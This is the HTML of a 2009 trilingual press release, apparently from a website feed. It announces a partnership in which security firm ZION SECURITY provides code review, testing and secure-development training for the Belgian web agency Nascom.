<p style="margin-top:20px;padding:0;color:#5a5b5b;font-size:11px;font-family:Arial;">Nascom en ZION SECURITY nemen hierin liever een proactieve houding aan. Ze brengen security al van in het begin van het productieproces in rekening, en kunnen zo veel onnodige kosten en lasten vermijden.</p>
</td>
<td valign="top" style="margin: 0pt; padding: 0pt; width: 294px; text-align: right;"><br /> <img src="http://www.nascom.be/nascommailing/zion/img/zion_nascom.gif" width="252" height="310" alt="Nascom en ZION SECURITY starten uniek partnership" style="border:0;padding:0;margin:0;margin-top:63px"/> <br /></td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td valign="top">
<h4>Perfect partners</h4>
<p style="margin-left:20px;margin-right:20px;margin-bottom:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Applicaties moeten veilig zijn, altijd en overal. Dat is het uitgangspunt van dit partnership. Nascom houdt zich bezig met het bouwen van de applicaties en legt het waken over de veiligheid van (web) toepassingen in de deskundige handen van een derde onafhankelijke partij. Ze vond in het Leuvense ZION SECURITY de perfecte partner hiervoor.</p>
<p style="margin-left:20px;margin-right:20px;margin-bottom:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">ZION SECURITY blijft gedurende het hele project nauw betrokken om veiligheidsissues in de kiem te smoren, zodat bij oplevering een veilige applicatie de deur uitgaat.</p>
</td>
</tr>
<tr>
<td valign="top">
<table border="0" cellspacing="0" cellpadding="0" style="width: 550px; border-collapse: collapse; margin-bottom: 15px;">
<tbody>
<tr>
<td width="296" valign="top">
<h4>Investeren in kennis</h4>
<p style="margin-left:20px;margin-right:20px;margin-bottom:0;color:#5a5b5b;font-size:11px;font-family:Arial;">Nascom neemt voortaan diensten van ZION SECURITY mee op in haar aanbod. Zo zitten een risico-analyse en een uitgebreide testronde in het totaalpakket dat de klant aankoopt. Optioneel kan de klant kiezen voor consultancy op maat en het nieuwe &lsquo;ZION VERIFIED&rsquo;, een oplossing die de applicatie na ontwikkeling blijft beschermen tegen externe bedreigingen.</p>
</td>
<td width="254" valign="middle">
<p style="padding:0;margin:0;text-align:right;"><img src="http://www.nascom.be/nascommailing/zion/img/mail-quote-knowledge-invest-nl.gif" width="225" height="55" alt="Veilige applicaties, altijd en overal" style="margin:0 20px 0 0;padding:0;border:0;"/></p>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td valign="top">
<p style="margin-left:20px;margin-right:20px;margin-bottom:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Investeren in kennis is essentieel om dit gemeenschappelijke doel waar te maken. Nascom medewerkers werden door de specialisten van ZION SECURITY grondig opgeleid om de juiste know-how en expertise te garanderen.</p>
<p style="margin-left:20px;margin-right:20px;margin-bottom:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Als eerste ontwikkelaar van online toepassingen in Belgi&euml; implementeert Nascom een &lsquo;Secure Development Life cycle&rsquo; (SDL), en integreert ze veiligheidsgerelateerde kennis en effort in haar standaard SDL. Dat betekent onder meer dat ZION SECURITY, bij iedere applicatie die dit vereist, standaard een code review en testing uitvoert.</p>
</td>
</tr>
<tr>
<td valign="top">
<h4>Valkuilen omzeilen</h4>
<p style="margin:0;color:#5a5b5b;font-size:11px;font-family:Arial;margin:0 0 15px 20px;">ZION SECURITY beveelt op haar beurt Nascom aan als strategische partner voor &lsquo;secure web development&rsquo; bij haar klanten. Ze hebben vertrouwen in het niveau van Nascom en weten dat hun manier van programmeren en de implementatie van de SDL veilige applicaties garandeert.</p>
<p style="margin:0;color:#5a5b5b;font-size:11px;font-family:Arial;margin:0 0 15px 20px;">Dankzij deze aanpak worden typische valkuilen op gebied van security vermeden, want er wordt vanaf de start van het project al op gefocust. De klant kan dus op een veilige applicatie rekenen aan het eind van het productieproces.</p>
</td>
</tr>
<tr>
<td valign="top">
<p style="margin-top:20px;margin-right:0;margin-bottom:15px;margin-left:20px;"><img src="http://www.nascom.be/nascommailing/zion/img/meer-info.gif" width="64" height="10" alt="meer info" style="border:0"/></p>
<h3>Nascom</h3>
<p style="margin-top:0;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Jonas Coenen (<a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="mailto:jonas.coenen@nascom.be" title="mail to jonas.coenen@nascom.be">jonas.coenen@nascom.be</a>)<br /> t: +32 89 20 15 00<br /> f: +32 89 20 15 01</p>
<h4>ZION SECURITY</h4>
<p style="margin-top:0;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Christophe Joos (Sales &amp; Account Manager) (<a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="mailto:christophe.joos@zionsecurity.com" title="mail to christophe.joos@zionsecurity.com">christophe.joos@zionsecurity.com</a>)<br /> m: +32 495/83 51 31<br /> t: +32 16/29 79 22</p>
</td>
</tr>
<tr>
<td valign="top">
<h4>Wie is Nascom?</h4>
<p style="margin-top:0;margin-right:0;margin-bottom:10px;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Nascom is een jong en dynamisch agency dat zich profileert in de interactieve sector op 4 vlakken: Digital Campaigns, Digital Applications, Mobile en Services. Meer dan 70 enthousiaste creatievelingen geven er elke dag het beste van zichzelf.</p>
<p style="margin-top:0;margin-right:0;margin-bottom:20px;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Meer weten over Nascom? Kijk op <a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="http://www.nascom.be" title="Wie is Nascom">www.nascom.be</a></p>
<h4>Wie is ZION SECURITY?</h4>
<p style="margin-top:0;margin-right:0;margin-bottom:10px;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Het Leuvense ZION SECURITY werd in 2005 opgericht door Ir. Erwin Geirnaert en Jessica Nieuwdorp. De medewerkers zijn experts in IT en beveiliging met jarenlange ervaring in projecten voor grote, middelgrote en kleine ondernemingen. Ze zijn gespecialiseerd in het beveiligen van business en e-business applicaties, e-commerce shops en netwerkinfrastructuur.</p>
<p style="margin-top:0;margin-right:0;margin-bottom:10px;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Meer weten over ZION SECURITY? Kijk op <a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="http://www.zionsecurity.com" title="Wie is ZION SECURITY">www.zionsecurity.com</a>.</p>
</td>
</tr>
<tr>
<td valign="top">
<p style="margin:10px 0 10px 20px;"><a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="#top" title="Top">Top</a></p>
</td>
</tr>
<tr>
<td valign="top">
<p style="margin-top:25px;margin-left:20px;margin-bottom:5px;color:#5a5b5b;font-size:11px;font-family:Arial"><a name="frans"></a>fran&ccedil;ais</p>
</td>
</tr>
<tr>
<td valign="top" style="margin-top:5px;margin-left:20px;"><img src="http://www.nascom.be/nascommailing/zion/img/mail-title-fr.gif" width="516" height="64" alt="Nascom et ZION SECURITY mettent partenariat unique en marche" style="border:0;padding:0;margin:0 0 0 20px;"/></td>
</tr>
<tr>
<td valign="top">
<table border="0" cellspacing="0" cellpadding="0" width="550" style="border-collapse:collapse;">
<tbody>
<tr>
<td valign="top" style="margin: 0pt; padding: 25px 0px 35px 20px; width: 236px; height: 310px;">
<h1>Hasselt / Louvain 17 septembre 2009</h1>
<p style="margin-bottom:20px;padding:0;color:#5a5b5b;font-size:11px;font-family:Arial;margin-bottom:25px;"><strong>Un d&eacute;veloppeur d&rsquo;applications en ligne et un expert de solutions de s&eacute;curit&eacute; mettent en route un partenariat unique pour pouvoir offrir un service complet aux clients.</strong></p>
<img src="http://www.nascom.be/nascommailing/zion/img/mail-quote-intro-en.gif" width="169" height="54" alt="Better safe than sorry" style="padding:0;border:0;margin-left:25px"/>
<p style="margin-top:20px;padding:0;color:#5a5b5b;font-size:11px;font-family:Arial;">Quand il s&rsquo;agit d&rsquo;applications (web), les probl&egrave;mes de s&eacute;curit&eacute; ne sont typiquement adress&eacute;s qu&rsquo;au moment o&ugrave; un &lsquo;hack&rsquo; a &eacute;t&eacute; d&eacute;termin&eacute; et un probl&egrave;me urgent se pr&eacute;sente. Dans le meilleur des cas, une application est test&eacute;e sur des risques de s&eacute;curit&eacute; apr&egrave;s la livraison.</p>
<p style="margin-top:20px;padding:0;color:#5a5b5b;font-size:11px;font-family:Arial;">Nascom et ZION SECURITY pr&eacute;f&egrave;rent adopter une attitude proactive. Ils introduisent la s&eacute;curit&eacute; au d&eacute;part du projet, et peuvent ainsi &eacute;viter beaucoup de frais et de probl&egrave;mes &eacute;ventuels.</p>
</td>
<td valign="top" style="margin: 0pt; padding: 0pt; width: 294px; text-align: right;"><br /> <img src="http://www.nascom.be/nascommailing/zion/img/zion_nascom.gif" width="252" height="310" alt="Nascom et ZION SECURITY mettent partenariat unique en marche" style="border:0;padding:0;margin:0;margin-top:63px"/> <br /></td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td valign="top">
<h4>Partenariat parfait</h4>
<p style="margin-left:20px;margin-right:20px;margin-bottom:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Le point de d&eacute;part de ce partenariat est de veiller sur la s&eacute;curit&eacute; de chaque application. Nascom s&rsquo;occupe du d&eacute;veloppement des applications et laisse la question de la s&eacute;curit&eacute; dans les mains comp&eacute;tentes d&rsquo;un partenaire tiers et ind&eacute;pendant. En ZION SECURITY, elle a trouv&eacute; le partenaire id&eacute;al.</p>
<p style="margin-left:20px;margin-right:20px;margin-bottom:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">ZION SECURITY reste associ&eacute; de tr&egrave;s pr&egrave;s au projet pendant le proc&egrave;s entier et s&rsquo;occupe des probl&egrave;mes de s&eacute;curit&eacute;. Cela a pour r&eacute;sultat que le client puisse compter sur une application sans risque au moment de la livraison.</p>
</td>
</tr>
<tr>
<td valign="top">
<table border="0" cellspacing="0" cellpadding="0" style="width: 550px; border-collapse: collapse; margin-bottom: 15px;">
<tbody>
<tr>
<td width="296" valign="top">
<h4>Investir dans les connaissances</h4>
<p style="margin-left:20px;margin-right:20px;margin-bottom:0;color:#5a5b5b;font-size:11px;font-family:Arial;">Nascom offrira d&eacute;sormais des services de ZION SECURITY dans son offre initial au client, comme une analyse des risques et un testing profond.  Le client a l&rsquo;option d&rsquo;obtenir une expertise sur mesure ainsi que le nouveau service &lsquo;ZION VERIFIED&rsquo;, une solution qui aide &agrave; prot&eacute;ger l&rsquo;application contre des menaces ext&eacute;rieures apr&egrave;s le d&eacute;veloppement.</p>
</td>
<td width="254" valign="middle">
<p style="padding:0;margin:0;text-align:right;"><img src="http://www.nascom.be/nascommailing/zion/img/mail-quote-knowledge-invest-fr.gif" width="225" height="68" alt="Veiller sur la s&eacute;curit&eacute; de chaque application" style="margin:0 20px 0 0;padding:0;border:0;"/></p>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td valign="top">
<p style="margin-left:20px;margin-right:20px;margin-bottom:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Investir dans les connaissances est essentiel. Les employ&eacute;s de Nascom ont re&ccedil;u une formation approfondie des sp&eacute;cialistes chez ZION SECURITY afin de pouvoir garantir un savoir-faire correct.</p>
<p style="margin-left:20px;margin-right:20px;margin-bottom:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Nascom est le premier d&eacute;veloppeur d&rsquo;applications en ligne en Belgique &agrave; impl&eacute;menter un &lsquo;Secure Development Life cycle&rsquo; (SDL). ZION SECURITY va toujours ex&eacute;cuter un code review et du testing, sur chaque application qui en a besoin.</p>
</td>
</tr>
<tr>
<td valign="top">
<h4>&eacute;viter les pi&egrave;ges</h4>
<p style="margin:0;color:#5a5b5b;font-size:11px;font-family:Arial;margin:0 0 15px 20px;">ZION SECURITY recommandera Nascom comme partenaire strat&eacute;gique pour le &lsquo;secure web development&rsquo; aupr&egrave;s de ses clients. Ils ont confiance au niveau d&rsquo;expertise chez Nascom et savent qu&rsquo;avec leur fa&ccedil;on de programmer et l&rsquo;impl&eacute;mentation du SDL la s&eacute;curit&eacute; des applications est garantie.</p>
<p style="margin:0;color:#5a5b5b;font-size:11px;font-family:Arial;margin:0 0 15px 20px;">Gr&acirc;ce &agrave; cette nouvelle approche, les pi&egrave;ges typiques en ce qui concerne des probl&egrave;mes de s&eacute;curit&eacute; peuvent &ecirc;tre &eacute;vit&eacute;s.</p>
</td>
</tr>
<tr>
<td valign="top">
<p style="margin-top:20px;margin-right:0;margin-bottom:15px;margin-left:20px;"><img src="http://www.nascom.be/nascommailing/zion/img/plus-info.gif" width="111" height="10" alt="Pour plus d'info:" style="border:0"/></p>
<h3>Nascom</h3>
<p style="margin-top:0;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Jonas Coenen (<a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="mailto:jonas.coenen@nascom.be" title="mail to jonas.coenen@nascom.be">jonas.coenen@nascom.be</a>)<br /> t: +32 89 20 15 00<br /> f: +32 89 20 15 01</p>
<h4>ZION SECURITY</h4>
<p style="margin-top:0;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Christophe Joos (Sales &amp; Account Manager) (<a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="mailto:christophe.joos@zionsecurity.com" title="mail to christophe.joos@zionsecurity.com">christophe.joos@zionsecurity.com</a>)<br /> m: +32 495/83 51 31<br /> t: +32 16/29 79 22</p>
</td>
</tr>
<tr>
<td valign="top">
<h4>Qui est Nascom?</h4>
<p style="margin-top:0;margin-right:0;margin-bottom:10px;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Nascom est une entreprise digitale avec une &eacute;quipe dynamique, passionn&eacute;e, sp&eacute;cialis&eacute;e en 4 disciplines interactives: les Campagnes Digitales, les Applications Digitales, le secteur Mobile et des Services. Nascom emploie plus de 70 personnes cr&eacute;atives.</p>
<p style="margin-top:0;margin-right:0;margin-bottom:20px;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">En savoir plus? Visitez <a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="http://www.nascom.be" title="Visitez www.nascom.be">www.nascom.be</a></p>
<h4>Qui est ZION SECURITY?</h4>
<p style="margin-top:0;margin-right:0;margin-bottom:10px;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">ZION SECURITY &agrave; Louvain, a &eacute;t&eacute; fond&eacute; en 2005 par Ir. Erwin Geirnaert et Jessica Nieuwdorp. Ses consultants sont des experts en IT et en s&eacute;curit&eacute; qui ont beaucoup d&rsquo;exp&eacute;rience dans le secteur. Ils sont sp&eacute;cialis&eacute;s en la s&eacute;curit&eacute; des applications business et e-business, des boutiques e-commerce et &lsquo;network infrastructure&rsquo;.</p>
<p style="margin-top:0;margin-right:0;margin-bottom:10px;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">En savoir plus? Visitez <a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="http://www.zionsecurity.com" title="Visitez www.zionsecurity.com">www.zionsecurity.com</a>.</p>
</td>
</tr>
<tr>
<td valign="top">
<p style="margin:10px 0 10px 20px;"><a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="#top" title="Top">Top</a></p>
</td>
</tr>
<tr>
<td>
<table border="0" cellspacing="0" cellpadding="0" style="background: #111112 none repeat scroll 0% 0%; width: 550px; border-collapse: collapse;">
<tbody>
<tr>
<td valign="top" style="padding:0;margin:0;">
<p style="margin:0 0 15px 20px;"><img src="http://www.nascom.be/nascommailing/zion/img/mail-contact.gif" width="74" height="15" alt="Contact HQ" style="border:0;"/></p>
<p style="margin: 0pt 0pt 0pt 20px; padding: 0pt; width: 135px; color: #555655; font-size: 12px; line-height: 16px; font-family: Arial;">Nascom Genk<br /> C-Mine 1 bus 13<br /> Evence Copp&eacute;elaan 91<br /> 3600 Genk<br /> Belgium (Map)</p>
</td>
<td valign="top" style="border-left:1px solid #686868;border-right:1px solid #686868;padding:0;margin:0;">
<p style="margin:0 0 15px 20px;"><img src="http://www.nascom.be/nascommailing/zion/img/mail-contact-sales.gif" width="94" height="13" alt="Contact Sales" style="border:0;"/></p>
<p style="margin: 0pt 0pt 0pt 20px; padding: 0pt; width: 135px; color: #555655; font-size: 12px; line-height: 16px; font-family: Arial;">Nascom Diegem<br /> MC-SQUARE<br /> Lambroekstraat 5a<br /> 1831 Diegem<br /> Belgium (Map)</p>
</td>
<td valign="top" style="padding:0;margin:0;">
<p style="margin:0 0 15px 20px;"><img src="http://www.nascom.be/nascommailing/zion/img/mail-what.gif" width="75" height="13" alt="What we do" style="border:0;"/></p>
<p style="margin: 0pt 0pt 0pt 20px; padding: 0pt; width: 140px; color: #555655; font-size: 12px; line-height: 16px; font-family: Arial;">Rich media applications<br /> Campaigns<br /> Social media<br /> Mobile</p>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td valign="bottom" style="background: #111112 none repeat scroll 0% 0%; height: 53px;">
<table border="0" cellspacing="0" cellpadding="0" style="width: 550px; height: 34px; border-collapse: collapse;">
<tbody>
<tr>
<td valign="bottom" style="padding:0;margin:0;"><a href="mailto:info@nascom.be" title="e-mail us"><img src="http://www.nascom.be/nascommailing/zion/img/mail-email.gif" width="56" height="34" alt="e-mail us" style="border:none;"/></a></td>
<td valign="top" style="padding:0;margin:0;">
<p style="padding:0;margin:3px 0 0;color:#5a5b5b;font-size:11px;font-family:Arial;">Phone +32 89 20 15 00</p>
</td>
<td valign="top" style="padding:0;margin:0;">
<p style="padding:0;margin:3px 0 0;color:#5a5b5b;font-size:11px;font-family:Arial;">Fax +32 89 20 15 01</p>
</td>
<td valign="top" style="padding:0;margin:0;">
<p style="padding:0;margin:3px 0 0;color:#5a5b5b;font-size:11px;font-family:Arial;">VAT 479.316.194</p>
</td>
<td valign="bottom" style="padding:0;margin:0;text-align:right;"><a href="http://www.youtube.com/user/nascomhq" title="Nascom HQ"><img src="http://www.nascom.be/nascommailing/zion/img/mail-youtube.gif" width="88" height="34" alt="Nascom HQ" style="border:none;"/></a></td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
</tr>
</tbody>
</table>]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Nascom &amp; ZI<strong class="red">O</strong>N SECURITY start up unique partnership</span></p>
<table border="0" cellspacing="0" cellpadding="0" width="550" style="border-collapse:collapse;">
<tbody>
<tr>
<td valign="top" style="text-align:center;">
<p style="color:#5a5b5b;font-size:11px;font-family:Arial;">&nbsp;</p>
</td>
</tr>
<tr>
<td valign="top"><img src="http://www.nascom.be/nascommailing/zion/img/mail-head.gif" width="550" height="57" alt="nascom" style="border:0;"/></td>
</tr>
<tr>
<td valign="top" bgcolor="#f3f3f3">
<p style="margin-top:15px;margin-bottom:15px;margin-left:20px;color:#dc2127"><a name="top"></a><a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="/partners/nascom/partnership.aspx#english" title="English">English</a> | <a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="/partners/nascom/partnership.aspx#nederlands" title="Nederlands">Nederlands</a> | <a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="/partners/nascom/partnership.aspx#frans" title="Fran&ccedil;ais">Fran&ccedil;ais</a></p>
</td>
</tr>
<tr>
<td valign="top">
<p style="margin-top:25px;margin-left:20px;margin-bottom:5px;color:#5a5b5b;font-size:11px;font-family:Arial"><a name="english"></a>English</p>
</td>
</tr>
<tr>
<td valign="top" style="margin-top:5px;margin-left:20px;"><img src="http://www.nascom.be/nascommailing/zion/img/mail-title-en.gif" width="516" height="64" alt="Nascom and ZION SECURITY start up unique partnership " style="border:0;padding:0;margin:0 0 0 20px;"/></td>
</tr>
<tr>
<td valign="top">
<table border="0" cellspacing="0" cellpadding="0" width="550" style="border-collapse:collapse;">
<tbody>
<tr>
<td valign="top" style="margin: 0pt; padding: 25px 0px 35px 20px; width: 236px; height: 310px;">
<h3>Hasselt / Leuven 17 September 2009</h3>
<p style="margin-bottom:20px;padding:0;color:#5a5b5b;font-size:11px;font-family:Arial;margin-bottom:25px;"><strong>An online application developer and an expert in security solutions are joining forces to offer a full service to their customers.</strong></p>
<img src="http://www.nascom.be/nascommailing/zion/img/mail-quote-intro-en.gif" width="169" height="54" alt="Better safe than sorry" style="padding:0;border:0;margin-left:25px"/>
<p style="margin-top:20px;padding:0;color:#5a5b5b;font-size:11px;font-family:Arial;">Security issues are typically tackled at the moment a &lsquo;hack&rsquo; has been determined, and the company is confronted with an acute problem. In the best-case scenario, an application is tested on possible security risks after its delivery.</p>
<p style="margin-top:20px;padding:0;color:#5a5b5b;font-size:11px;font-family:Arial;">Nascom and ZION SECURITY prefer to adopt a proactive way of handling this. They are introducing security right from the start of the project, and can therefore avoid many unnecessary costs and hassles.</p>
</td>
<td valign="top" style="margin: 0pt; padding: 0pt; width: 294px; text-align: right;"><br /> <img src="http://www.nascom.be/nascommailing/zion/img/zion_nascom.gif" width="252" height="310" alt="Nascom and ZION SECURITY start up unique partnership" style="border:0;padding:0;margin:0;margin-top:63px"/> <br /></td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td valign="top">
<h4>Perfect partners</h4>
<p style="margin-left:20px;margin-right:20px;margin-bottom:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Applications must be secure, always. That is the starting point of this partnership. Nascom takes care of building the applications and puts the security related issues of delivering (web) applications in the professional hands of a third and independent party. Leuven-based ZION SECURITY proved to be a perfect partner.</p>
<p style="margin-left:20px;margin-right:20px;margin-bottom:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">ZION SECURITY stays closely involved with the project throughout the entire process to nip security issues in the bud, resulting in 100% secure applications at the time of delivery to the customer.</p>
</td>
</tr>
<tr>
<td valign="top">
<table border="0" cellspacing="0" cellpadding="0" style="width: 550px; border-collapse: collapse; margin-bottom: 15px;">
<tbody>
<tr>
<td width="296" valign="top">
<h4>Investing in knowledge</h4>
<p style="margin-left:20px;margin-right:20px;margin-bottom:0;color:#5a5b5b;font-size:11px;font-family:Arial;">From now on Nascom will include ZION SECURITY services in its offerings to clients, including risk analysis and thorough testing. The customer has the option to get consultancy and the brand new service &lsquo;ZION VERIFIED&rsquo;, a solution that helps protect the application after development against external threats.</p>
</td>
<td width="254" valign="middle">
<p style="padding:0;margin:0;text-align:right;"><img src="http://www.nascom.be/nascommailing/zion/img/mail-quote-knowledge-invest.gif" width="225" height="55" alt="Applications must be secure, always&rsquo;" style="margin:0 20px 0 0;padding:0;border:0;"/></p>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td valign="top">
<p style="margin-left:20px;margin-right:20px;margin-bottom:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Investing in knowledge is essential to achieve the common goal that has been set. Nascom employees have been thoroughly trained by ZION SECURITY specialists, to guarantee the right know-how and expertise.</p>
<p style="margin-left:20px;margin-right:20px;margin-bottom:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">As the first developer of online applications in Belgium, Nascom is implementing a &lsquo;Secure Development Life cycle&rsquo; (SDL), and integrating security related knowledge and effort in her standard SDL. This entails among other things that ZION SECURITY will execute a code review as well as testing as a standard for every application that requires it.</p>
</td>
</tr>
<tr>
<td valign="top">
<h4>Avoid traps</h4>
<p style="margin:0;color:#5a5b5b;font-size:11px;font-family:Arial;margin:0 0 15px 20px;">ZION SECURITY will in turn recommend Nascom as a strategic partner for &lsquo;secure web development&rsquo; with its customers. They have faith in the level of expertise at Nascom and know that their way of programming and the implementation of the SDL will lead to secure applications.</p>
<p style="margin:0;color:#5a5b5b;font-size:11px;font-family:Arial;margin:0 0 15px 20px;">Thanks to this new approach, typical security related traps can be avoided, since they are tackled right from the start of the project. The customer can count on a secure application at the end of the production process.</p>
</td>
</tr>
<tr>
<td valign="top">
<p style="margin-top:20px;margin-right:0;margin-bottom:15px;margin-left:20px;"><img src="http://www.nascom.be/nascommailing/zion/img/mail-more-info.gif" width="64" height="10" alt="More info:" style="border:0"/></p>
<h3>Nascom</h3>
<p style="margin-top:0;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Jonas Coenen (<a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="mailto:jonas.coenen@nascom.be" title="mail to jonas.coenen@nascom.be">jonas.coenen@nascom.be</a>)<br /> t: +32 89 20 15 00<br /> f: +32 89 20 15 01</p>
<h4>ZION SECURITY</h4>
<p style="margin-top:0;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Christophe Joos (Sales &amp; Account Manager) (<a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="mailto:christophe.joos@zionsecurity.com" title="mail to christophe.joos@zionsecurity.com">christophe.joos@zionsecurity.com</a>)<br /> m: +32 495/83 51 31<br /> t: +32 16/29 79 22</p>
</td>
</tr>
<tr>
<td valign="top">
<h4>Who is Nascom?</h4>
<p style="margin-top:0;margin-right:0;margin-bottom:10px;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Nascom is a young and dynamic agency specialized in 4 interactive fields: Digital Campaigns, Digital Applications, Mobile and Services. Nascom employs over 70 enthusiastic creative and skilled individuals.</p>
<p style="margin-top:0;margin-right:0;margin-bottom:20px;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Want to know more? Visit <a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="http://www.nascom.be" title="Wie is Nascom">www.nascom.be</a></p>
<h4>Who is ZION SECURITY?</h4>
<p style="margin-top:0;margin-right:0;margin-bottom:10px;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">The Leuven-based ZION SECURITY was founded in 2005 by Ir. Erwin Geirnaert and Jessica Nieuwdorp. Its consultants are experts in IT and security and have years of experience in executing projects for large, medium and small enterprises. They are specialized in securing business and e-business applications, e-commerce shops and network infrastructure.</p>
<p style="margin-top:0;margin-right:0;margin-bottom:10px;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Want to know more? Visit <a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="http://www.zionsecurity.com" title="Who is ZION SECURITY?">www.zionsecurity.com</a>.</p>
</td>
</tr>
<tr>
<td valign="top">
<p style="margin:10px 0 10px 20px;"><a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="#top" title="Top">Top</a></p>
</td>
</tr>
<tr>
<td valign="top">
<p style="margin-top:25px;margin-left:20px;margin-bottom:5px;color:#5a5b5b;font-size:11px;font-family:Arial"><a name="nederlands"></a>Nederlands</p>
</td>
</tr>
<tr>
<td valign="top" style="margin-top:5px;margin-left:20px;"><img src="http://www.nascom.be/nascommailing/zion/img/mail-title-nl.gif" width="516" height="64" alt="Nascom and ZION SECURITY start up unique partnership " style="border:0;padding:0;margin:0 0 0 20px;"/></td>
</tr>
<tr>
<td valign="top">
<table border="0" cellspacing="0" cellpadding="0" width="550" style="border-collapse:collapse;">
<tbody>
<tr>
<td valign="top" style="margin: 0pt; padding: 25px 0px 35px 20px; width: 236px; height: 310px;">
<h1>Hasselt / Leuven 17 september 2009</h1>
<p style="margin-bottom:20px;padding:0;color:#5a5b5b;font-size:11px;font-family:Arial;margin-bottom:25px;"><strong>Voor het eerst steken een ontwikkelaar van online toepassingen en een expert in security oplossingen de koppen bij mekaar om de klant een volledige service aan te bieden.</strong></p>
<img src="http://www.nascom.be/nascommailing/zion/img/mail-quote-intro-en.gif" width="169" height="54" alt="Better safe than sorry" style="padding:0;border:0;margin-left:25px"/>
<p style="margin-top:20px;padding:0;color:#5a5b5b;font-size:11px;font-family:Arial;">Vaak worden veiligheidsproblemen in applicaties pas aangepakt op het moment dat een &lsquo;hack&rsquo; wordt vastgesteld, en er een accuut probleem is. Of wordt er in het beste geval na projectoplevering getest op mogelijke veiligheidsrisico&rsquo;s.</p>
<p style="margin-top:20px;padding:0;color:#5a5b5b;font-size:11px;font-family:Arial;">Nascom en ZION SECURITY nemen hierin liever een proactieve houding aan. Ze brengen security al van in het begin van het productieproces in rekening, en kunnen zo veel onnodige kosten en lasten vermijden.</p>
</td>
<td valign="top" style="margin: 0pt; padding: 0pt; width: 294px; text-align: right;"><br /> <img src="http://www.nascom.be/nascommailing/zion/img/zion_nascom.gif" width="252" height="310" alt="Nascom en ZION SECURITY starten uniek partnership" style="border:0;padding:0;margin:0;margin-top:63px"/> <br /></td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td valign="top">
<h4>Perfect partners</h4>
<p style="margin-left:20px;margin-right:20px;margin-bottom:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Applicaties moeten veilig zijn, altijd en overal. Dat is het uitgangspunt van dit partnership. Nascom houdt zich bezig met het bouwen van de applicaties en legt het waken over de veiligheid van (web) toepassingen in de deskundige handen van een derde onafhankelijke partij. Ze vond in het Leuvense ZION SECURITY de perfecte partner hiervoor.</p>
<p style="margin-left:20px;margin-right:20px;margin-bottom:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">ZION SECURITY blijft gedurende het hele project nauw betrokken om veiligheidsissues in de kiem te smoren, zodat bij oplevering een veilige applicatie de deur uitgaat.</p>
</td>
</tr>
<tr>
<td valign="top">
<table border="0" cellspacing="0" cellpadding="0" style="width: 550px; border-collapse: collapse; margin-bottom: 15px;">
<tbody>
<tr>
<td width="296" valign="top">
<h4>Investeren in kennis</h4>
